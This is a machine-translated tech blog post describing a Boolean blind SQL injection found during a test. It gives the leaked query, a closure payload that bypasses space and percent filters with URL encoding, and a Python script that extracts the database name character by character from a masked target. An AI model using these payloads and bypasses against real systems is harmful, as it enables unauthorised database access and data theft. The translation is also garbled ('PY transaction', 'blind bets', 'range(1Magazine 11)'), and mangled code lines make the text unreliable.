Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to carry out the PY transaction analysis of Boolean blind bets. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

After good feedback from the previous post, I happened to find this Boolean loophole in the project, so I wrote this article with the same body format, but the content is different. Let me think about it next time to see what kind of PY deal I'm working on.

Identify the problem point

In this test process found an injection point, through the test found that the return package contains sql statements, confirm that it can be injected, started this injection attempt.

First of all, we can confirm that this is a get-type data call, thought it is a simple error injection, should be able to directly use sqlmap to exploit vulnerabilities, but the reality gave me a slap in the face. The sqlmap root method exploits this vulnerability, but my database statement actually appears in the returned packet, so I take out the returned database statement and start the construction process a little bit.

The copied database statement:

SELECT count (0) FROM customer c WHERE c.dealership_id =? AND c.active = true AND (c.full_name LIKE'% 1%') AND 1 IN (1,2) AND (c.full_name LIKE'% test%' OR c.phone_number LIKE'% 1%') AND 1 IN (1,2) AND (c.full_name LIKE'% test%' OR c.phone_number_sub1 LIKE'% 1%') AND 1 IN (1,2) AND (c.full_name LIKE'% test%' OR c.phone_number_sub2 LIKE'% 1%') AND 1 IN (1 2) AND (c.full_name LIKE'% test%') II. Test command statement

Through the experiment, it is found that the content of the error report is different, which shows that the parameters and parameters can indeed affect the database statement. However, the returned content needs to be closed and the returned content cannot be used, so types of injection such as error reporting can be excluded, and there are only two types of injection that can be detected: time blind injection. Boolean blind injection adds test statements directly after the target.

Construct the database statement:

%') {Test statement} AND (c. Full_name like'% test

Return success, achieve statement closure (in addition, using the database fuzzy query like%%), in the test found that there is filtering, separate% can not pass, the space can not pass, the system will return 404, for the previously burst database statements, using% 25 and% 20 to bypass the filtering of separate% and spaces to construct the closure of the above database statements, successfully returned 20000 Confirm that the normal packet can be returned, and the Boolean blind injection test can be carried out according to the correctness of the database statement.

Next, confirm the test statement.

27) and%0a (ascii (substr (database (), {1}, 1)) = {0})% 0aAND (c.full_name%0alike%0a%27%25test

Match in the form of bit intercept to confirm the database name

3. Tool ideas 3.1Using Post packets

Use python packets to test the target content in batch

Unlike time-based blind injection, Boolean blind injection confirms the problem according to the different return packets.

% 0a (ascii (substr (database (), {1}, 1)) = {0})% 0a

Use the find function to find the characteristics of the returned data and determine whether the injected data is successfully obtained.

# coding:utf-8import requestsimport datetimeimport timeheaders = {header information, add your own} chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.' Database =''for j in range (1Magazine 11): for i in range (49125): Url =' https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test' UrlFormat = Url.format (iMagazine) # format () function uses r = requests.get (UrlFormat) Headers=headers) d = r.content.find ("Test") # use the find function to find the characteristics of the returned data Judge whether the injection data if d! =-1: print (I) print chr (I) database + = chr (I) print database break else: pass IV.

Here are some ideas for the future of the code

1. Add the function called directly by the packet

two。 Modification for 0 value forever true

3. Optimize on the thread

4. Write code for the GET method

5. Perform logical refactoring of the whole code (this is blowing NB)

After reading the above, do you have any further understanding of how to conduct Boolean blind PY transaction analysis? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.